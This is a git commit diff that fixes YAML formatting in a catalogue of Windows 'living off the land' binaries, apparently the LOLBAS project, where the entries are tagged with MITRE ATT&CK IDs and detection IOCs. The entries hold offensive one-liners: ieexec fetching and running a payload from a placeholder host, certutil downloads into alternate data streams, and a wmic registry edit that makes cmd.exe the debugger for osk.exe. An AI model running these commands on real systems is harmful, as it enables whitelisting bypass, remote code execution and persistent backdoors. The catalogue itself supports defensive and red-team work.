Minor adjustments to be yaml compliant

This commit is contained in:
Oddvar Moe 2018-09-24 23:18:00 +02:00
parent 37cc1ee83e
commit f8fec9849b
12 changed files with 60 additions and 55 deletions

View File

@ -29,16 +29,16 @@ function Convert-YamlToMD
"name: $($YamlObject.Name)"| Add-Content $Outfile "name: $($YamlObject.Name)"| Add-Content $Outfile
"description: $($YamlObject.Description)"| Add-Content $Outfile "description: $($YamlObject.Description)"| Add-Content $Outfile
"function:"| Add-Content $Outfile "function:"| Add-Content $Outfile
# Need a category linked to the different things... Execute, Download, AWL-bypass.
foreach($cmd in $YamlObject.Commands) foreach($cmd in $YamlObject.Commands)
{ {
" $($cmd.Category):"| Add-Content $Outfile " $($cmd.Category):"| Add-Content $Outfile
" - description: $($cmd.Description)"| Add-Content $Outfile " - description: $($cmd.Description)"| Add-Content $Outfile
" code: $($cmd.Command)"| Add-Content $Outfile " code: $($cmd.Command)"| Add-Content $Outfile
" code: $($cmd.Command)"| Add-Content $Outfile
" mitreid: $($cmd.MitreID)"| Add-Content $Outfile " mitreid: $($cmd.MitreID)"| Add-Content $Outfile
" mitrelink: $($cmd.MitreLink)"| Add-Content $Outfile " mitrelink: $($cmd.MitreLink)"| Add-Content $Outfile
" operatingsystem: $($cmd.Operatingsystem)"| Add-Content $Outfile
" privileges: $($cmd.Privileges)"| Add-Content $Outfile
} }
"resources:"| Add-Content $Outfile "resources:"| Add-Content $Outfile
foreach($link in $YamlObject.Resources) foreach($link in $YamlObject.Resources)
@ -48,9 +48,14 @@ function Convert-YamlToMD
"fullpath:"| Add-Content $Outfile "fullpath:"| Add-Content $Outfile
foreach($path in $YamlObject.'Full path') foreach($path in $YamlObject.'Full path')
{ {
" - path: $($path)"| Add-Content $Outfile " - Path: $($path)"| Add-Content $Outfile
}
"acknowledgement:"| Add-Content $Outfile
foreach($pers in $YamlObject.Acknowledgement)
{
" - Person: $($pers.Person)"| Add-Content $Outfile
" Handle: `'$($pers.Handle)`'"| Add-Content $Outfile
} }
"notes: $($YamlObject.Notes)"| Add-Content $Outfile
"---" | Add-Content $Outfile "---" | Add-Content $Outfile
} }
End End
@ -112,11 +117,11 @@ function Invoke-GenerateMD
#Generate the stuff! #Generate the stuff!
#Bins #Bins
#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "c:\tamp\Binaries" -Verbose ##Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "c:\tamp\Binaries" -Verbose
Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherMSBinaries" -Outpath "c:\tamp\OtherMSBinaries" -Verbose Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherMSBinaries" -Outpath "c:\tamp\OtherMSBinaries" -Verbose
##Scripts ##Scripts
#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSScripts" -Outpath "c:\tamp\SCripts" -Verbose ##Invoke-GenerateMD -YmlPath "$mainpath\yml\OSScripts" -Outpath "c:\tamp\Scripts" -Verbose
##Libs ##Libs
#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSLibraries" -Outpath "c:\tamp\Libraries" -Verbose ##Invoke-GenerateMD -YmlPath "$mainpath\yml\OSLibraries" -Outpath "c:\tamp\Libraries" -Verbose

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10 OperatingSystem: Windows 10
- Command: bash.exe -c calc.exe - Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe Description: Executes calc.exe from bash.exe
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
Category: AWL Bypass Category: AWL Bypass
@ -24,9 +24,9 @@ Full Path:
- Path: C:\Windows\System32\bash.exe - Path: C:\Windows\System32\bash.exe
- Path: C:\Windows\SysWOW64\bash.exe - Path: C:\Windows\SysWOW64\bash.exe
Code Sample: Code Sample:
- Code: - Code:
Detection: Detection:
- IOC: Child process from bash.exe - IOC: Child process from bash.exe
Resources: Resources:
- Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
Acknowledgement: Acknowledgement:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1096 MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 - Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
Usecase: Download file from Internet Usecase: Download file from Internet
Category: Download Category: Download
@ -20,7 +20,7 @@ Commands:
MitreID: T1105 MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105 MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
Description: Command for copying cmd.exe to another folder Description: Command for copying cmd.exe to another folder
Usecase: Copy file Usecase: Copy file
Category: Copy Category: Copy
@ -28,7 +28,7 @@ Commands:
MitreID: T1105 MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105 MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
Usecase: Execute binary file specified. Can be used as a defensive evasion. Usecase: Execute binary file specified. Can be used as a defensive evasion.
Category: Execute Category: Execute
@ -40,11 +40,11 @@ Full Path:
- Path: C:\Windows\System32\bitsadmin.exe - Path: C:\Windows\System32\bitsadmin.exe
- Path: C:\Windows\SysWOW64\bitsadmin.exe - Path: C:\Windows\SysWOW64\bitsadmin.exe
Code Sample: Code Sample:
- Code: - Code:
Detection: Detection:
- IOC: Child process from bitsadmin.exe - IOC: Child process from bitsadmin.exe
- IOC: bitsadmin creates new files - IOC: bitsadmin creates new files
- IOC: bitsadmin adds data to alternate data stream - IOC: bitsadmin adds data to alternate data stream
Resources: Resources:
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53 - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53
- Link: https://www.youtube.com/watch?v=_8xJaaQlpBo - Link: https://www.youtube.com/watch?v=_8xJaaQlpBo

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1105 MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105 MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Description: Download and save a PS1 file to an Alternate Data Stream (ADS). Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
Category: Alternate data streams Category: Alternate data streams
@ -20,7 +20,7 @@ Commands:
MitreID: T1105 MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105 MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil -encode inputFileName encodedOutputFileName - Command: certutil -encode inputFileName encodedOutputFileName
Description: Command to encode a file using Base64 Description: Command to encode a file using Base64
Usecase: Encode files to evade defensive measures Usecase: Encode files to evade defensive measures
Category: Encode Category: Encode
@ -28,7 +28,7 @@ Commands:
MitreID: T1027 MitreID: T1027
MitreLink: https://attack.mitre.org/wiki/Technique/T1027 MitreLink: https://attack.mitre.org/wiki/Technique/T1027
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil -decode encodedInputFileName decodedOutputFileName - Command: certutil -decode encodedInputFileName decodedOutputFileName
Description: Command to decode a Base64 encoded file. Description: Command to decode a Base64 encoded file.
Usecase: Decode files to evade defensive measures Usecase: Decode files to evade defensive measures
Category: Decode Category: Decode
@ -40,11 +40,11 @@ Full Path:
- Path: C:\Windows\System32\certutil.exe - Path: C:\Windows\System32\certutil.exe
- Path: C:\Windows\SysWOW64\certutil.exe - Path: C:\Windows\SysWOW64\certutil.exe
Code Sample: Code Sample:
- Code: - Code:
Detection: Detection:
- IOC: Certutil.exe creating new files on disk - IOC: Certutil.exe creating new files on disk
- IOC: Useragent Microsoft-CryptoAPI/10.0 - IOC: Useragent Microsoft-CryptoAPI/10.0
- IOC: Useragent CertUtil URL Agent - IOC: Useragent CertUtil URL Agent
Resources: Resources:
- Link: https://twitter.com/Moriarty_Meng/status/984380793383370752 - Link: https://twitter.com/Moriarty_Meng/status/984380793383370752
- Link: https://twitter.com/mattifestation/status/620107926288515072 - Link: https://twitter.com/mattifestation/status/620107926288515072

View File

@ -4,7 +4,7 @@ Description: The IEExec.exe application is an undocumented Microsoft .NET Framew
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: '2018-05-25'
Commands: Commands:
- Command:ieexec.exe http://x.x.x.x:8080/bypass.exe - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: Downloads and executes bypass.exe from the remote server. Description: Downloads and executes bypass.exe from the remote server.
Usecase: Download and run attacker code from remote location Usecase: Download and run attacker code from remote location
Category: Download Category: Download
@ -12,7 +12,7 @@ Commands:
MitreID: T1105 MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105 MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command:ieexec.exe http://x.x.x.x:8080/bypass.exe - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: Downloads and executes bypass.exe from the remote server. Description: Downloads and executes bypass.exe from the remote server.
Usecase: Download and run attacker code from remote location Usecase: Download and run attacker code from remote location
Category: Execute Category: Execute
@ -24,9 +24,9 @@ Full Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
Code Sample: Code Sample:
- Code: - Code:
Detection: Detection:
- IOC: - IOC:
Resources: Resources:
- Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ - Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
Acknowledgement: Acknowledgement:

View File

@ -40,9 +40,9 @@ Full Path:
- Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\System32\msiexec.exe
- Path: C:\Windows\SysWOW64\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe
Code Sample: Code Sample:
- Code: - Code:
Detection: Detection:
- IOC: msiexec.exe getting files from Internet - IOC: msiexec.exe getting files from Internet
Resources: Resources:
- Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/ - Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
- Link: https://twitter.com/PhilipTsukerman/status/992021361106268161 - Link: https://twitter.com/PhilipTsukerman/status/992021361106268161
@ -50,5 +50,5 @@ Acknowledgement:
- Person: netbiosX - Person: netbiosX
Handle: '@netbiosX' Handle: '@netbiosX'
- Person: Philip Tsukerman - Person: Philip Tsukerman
Handle: @PhilipTsukerman Handle: '@PhilipTsukerman'
--- ---

View File

@ -31,14 +31,14 @@ Commands:
Full Path: Full Path:
- Path: C:\Windows\System32\pcalua.exe - Path: C:\Windows\System32\pcalua.exe
Code Sample: Code Sample:
- Code: - Code:
Detection: Detection:
- IOC: - IOC:
Resources: Resources:
- Link: https://twitter.com/KyleHanslovan/status/912659279806640128 - Link: https://twitter.com/KyleHanslovan/status/912659279806640128
Acknowledgement: Acknowledgement:
- Person: Kyle Hanslovan - Person: Kyle Hanslovan
Handle: '@kylehanslovan' Handle: '@kylehanslovan'
- Person: Fab - Person: Fab
Handle: @0rbz_ Handle: '@0rbz_'
--- ---

View File

@ -1,4 +1,4 @@
--- ---
Name: Wab.exe Name: Wab.exe
Description: Windows address book manager Description: Windows address book manager
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
@ -16,9 +16,9 @@ Full Path:
- Path: C:\Program Files\Windows Mail\wab.exe - Path: C:\Program Files\Windows Mail\wab.exe
- Path: C:\Program Files (x86)\Windows Mail\wab.exe - Path: C:\Program Files (x86)\Windows Mail\wab.exe
Code Sample: Code Sample:
- Code: - Code:
Detection: Detection:
- IOC: WAB.exe should normally never be used - IOC: WAB.exe should normally never be used
Resources: Resources:
- Link: https://twitter.com/Hexacorn/status/991447379864932352 - Link: https://twitter.com/Hexacorn/status/991447379864932352
- Link: http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/ - Link: http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/

View File

@ -5,7 +5,7 @@ Author: 'Oddvar Moe'
Created: '2018-05-25' Created: '2018-05-25'
Commands: Commands:
- Command: wmic.exe process call create "c:\ads\file.txt:program.exe" - Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
Description: Execute a .EXE file stored as an Alternate Data Stream (ADS). Description: Execute a .EXE file stored as an Alternate Data Stream (ADS)
Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures
Category: Alternate data streams Category: Alternate data streams
Privileges: User Privileges: User
@ -20,7 +20,7 @@ Commands:
MitreID: T1218 MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" - Command: 'wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"'
Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well. Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures
Category: Execute Category: Execute
@ -72,9 +72,9 @@ Full Path:
- Path: C:\Windows\System32\wmic.exe - Path: C:\Windows\System32\wmic.exe
- Path: C:\Windows\SysWOW64\wmic.exe - Path: C:\Windows\SysWOW64\wmic.exe
Code Sample: Code Sample:
- Code: - Code:
Detection: Detection:
- IOC: Wmic getting scripts from remote system - IOC: Wmic getting scripts from remote system
Resources: Resources:
- Link: https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory - Link: https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
- Link: https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html - Link: https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html

View File

@ -49,7 +49,7 @@ Code Sample:
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct
Detection: Detection:
- IOC: '' - IOC:
Resources: Resources:
- Link: https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/ - Link: https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
- Link: https://twitter.com/ItsReallyNick/status/967859147977850880 - Link: https://twitter.com/ItsReallyNick/status/967859147977850880
@ -63,5 +63,5 @@ Acknowledgment:
- Person: Moriarty (RegisterOCX - CMD) - Person: Moriarty (RegisterOCX - CMD)
Handle: '@moriarty_meng' Handle: '@moriarty_meng'
- Person: Nick Carr (Threat Intel) - Person: Nick Carr (Threat Intel)
Handle: @ItsReallyNick Handle: '@ItsReallyNick'
--- ---

View File

@ -10,7 +10,7 @@ Commands:
Category: AWL Bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1085 MitreID: T1085
MItreLink: https://attack.mitre.org/wiki/Technique/T1085 MitreLink: https://attack.mitre.org/wiki/Technique/T1085
OperatingSystem: Windows OperatingSystem: Windows
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf
Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
@ -18,7 +18,7 @@ Commands:
Category: Execution Category: Execution
Privileges: User Privileges: User
MitreID: T1085 MitreID: T1085
MItreLink: https://attack.mitre.org/wiki/Technique/T1085 MitreLink: https://attack.mitre.org/wiki/Technique/T1085
OperatingSystem: Windows OperatingSystem: Windows
Full Path: Full Path:
- Path: c:\windows\system32\setupapi.dll - Path: c:\windows\system32\setupapi.dll
@ -29,7 +29,7 @@ Code Sample:
- Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct - Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct
- Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf - Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf
Detection: Detection:
- IOC: '' - IOC:
Resources: Resources:
- Link: https://github.com/huntresslabs/evading-autoruns - Link: https://github.com/huntresslabs/evading-autoruns
- Link: https://twitter.com/pabraeken/status/994742106852941825 - Link: https://twitter.com/pabraeken/status/994742106852941825
@ -42,5 +42,5 @@ Acknowledgment:
- Person: Casey Smith (COM Scriptlet) - Person: Casey Smith (COM Scriptlet)
Handle: '@subTee' Handle: '@subTee'
- Person: Nick Carr (Threat Intel) - Person: Nick Carr (Threat Intel)
Handle: @ItsReallyNick Handle: '@ItsReallyNick'
--- ---

View File

@ -6,11 +6,11 @@ Created: '2018-05-25'
Commands: Commands:
- Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
UseCase: Run local or remote script(let) code through INF file specification (Note: May pop an error window). UseCase: Run local or remote script(let) code through INF file specification (Note May pop an error window).
Category: AWL Bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1085 MitreID: T1085
MItreLink: https://attack.mitre.org/wiki/Technique/T1085 MitreLink: https://attack.mitre.org/wiki/Technique/T1085
OperatingSystem: Windows OperatingSystem: Windows
- Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
@ -18,7 +18,7 @@ Commands:
Category: Execution Category: Execution
Privileges: User Privileges: User
MitreID: T1085 MitreID: T1085
MItreLink: https://attack.mitre.org/wiki/Technique/T1085 MitreLink: https://attack.mitre.org/wiki/Technique/T1085
OperatingSystem: Windows OperatingSystem: Windows
Full Path: Full Path:
- Path: c:\windows\system32\syssetup.dll - Path: c:\windows\system32\syssetup.dll
@ -28,7 +28,7 @@ Code Sample:
- Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct - Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
- Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415 - Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415
Detection: Detection:
- IOC: '' - IOC:
Resources: Resources:
- Link: https://twitter.com/pabraeken/status/994392481927258113 - Link: https://twitter.com/pabraeken/status/994392481927258113
- Link: https://twitter.com/harr0ey/status/975350238184697857 - Link: https://twitter.com/harr0ey/status/975350238184697857
@ -41,4 +41,4 @@ Acknowledgment:
Handle: '@harr0ey' Handle: '@harr0ey'
- Person: Jimmy (Scriptlet) - Person: Jimmy (Scriptlet)
Handle: '@bohops' Handle: '@bohops'
--- ---